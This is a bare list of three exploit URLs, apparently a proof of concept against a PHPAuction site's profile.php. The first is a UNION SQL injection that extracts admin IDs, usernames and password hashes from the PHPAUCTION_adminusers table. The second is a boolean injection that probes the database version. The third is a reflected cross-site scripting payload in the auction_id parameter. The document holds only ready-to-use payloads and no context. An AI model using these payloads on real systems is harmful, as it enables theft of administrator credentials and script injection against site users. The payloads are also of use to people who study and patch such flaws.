http://www.example.com/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers-- http://www.example.com/profile.php?user_id=29%20and%20substring(@@version,1,1)=5-- http://www.example.com/profile.php?user_id=29&auction_id=9<script>alert(1);</script>